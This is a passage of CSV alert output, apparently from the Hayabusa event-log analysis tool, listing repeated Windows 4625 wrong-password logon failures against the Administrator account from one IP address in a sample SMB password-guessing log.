+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nXI0wWwzhHN0uvOP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.414 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ujGqTzfOhmKgoAjt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cFoPtWZ03O3ZZgOC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EyO2VTnpGZLeSIvr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ua69MEWABQ9hsooT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ubPQWn4nQYr3rXr8 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xrgATdNqkA44nKqf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qKwktiUfTWakNx3I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xVebPFnWhbZKIANs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IyV8stIvfXLJQpsn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uStfvm0y0eZrWONH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.920 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OUwTyUXe8NLG7bCS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.967 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HQuDp8aZpWDANKMe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GQKTlzx2gq9ayAtJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.061 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tCzVponBvb9mbyIr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.115 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mSwnrFv90KjN2cqj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QX5TLs2MPkia1cmk | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ammLKlG1Q5awQGvN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.235 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJ1ijJjPJbF4uFlo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZOLnwIzpGz03Yjh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xS8U3UQNz6l0LZn0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.361 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: no6cftQ5MF1fjZ0y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.392 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5WHS6jVRnCUH0Rb5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i3oGLwrCJXJOauf6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.477 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1sxPrDYV3rr4pGJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Osysh2O2A3A2bN22 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FsInW9EMJZU8FOrF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ge8do8TM4GG1atMx | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.641 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4w5GLbpVsAhGqCiq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8eQXeW1VpRU0ptMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NhLosoA2parzTnW9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MCFTP4gVGEKFKuRI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ALrDwJz2cta9fcXB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.841 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZZNXGw28osMQLjub | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.882 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4wQzvMnwYuEQRO7V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.917 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UloOAIgGuj6NecfR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cVSeLo2PRgGmf83Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SaCFO8CPFLuERugV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QCwV1D4L5BDZSriK | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.090 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QPhLQsM4R2ua4SxW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fwgp52JNi7xnTxpN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j2GutBDenjweAluz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.250 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wflcgg5ebqu8hHGL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jXaaYSU2pakw6IsK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.344 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BfJnBv3eA8wZttML | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kOXSI0jPfbvW4dAg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8JW6aX5mNz7cETsl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.478 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NVuJLXJzlVnDLT4Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WtSwhwnApnPI9AkO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.568 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1peOkjbd1WXGEAAM | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Tbw3V9MtLIcxr65R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CEZ2v1f6t0luDj4D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.689 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R0omMppAFlFhE1mG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.734 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0jMvVN9eSeGW3zcN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.782 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HnFNYabbO7IpbVku | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.816 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8KtyTTNdqVikZGYY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.864 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DCChjnFv2hMXXwgW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FvIYRZSomaJYJOH5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FEirUFRscaOwTuAg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RwQgMM9H1oN4te9Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JbGILYTcFwtYbDk1 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p5KzNsgWvyUhNEHd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.213 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KGvwbOtP3A5eDKCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YZvtNNX511hIleST | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.299 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lJBRTeW6OQtNrt5u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hovgq99STVt2GzrO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.380 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4kpT3gf0VCAVuVSa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tiB04AvkYp0PP3n1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.479 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PPluKgaiT10oC35V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8nCOM9uUeqv9QBx6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.574 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dSPrrNCh2FSWZKbI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.621 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aLDnCjr4pSdKAMX7 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G0UnmfB7lcXKEAvn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.722 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ogjMSxcUw7cF5dMa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 75uB8ejsSV5CbagM | IP Addr: 192.168.198.149 | AuthPackage: 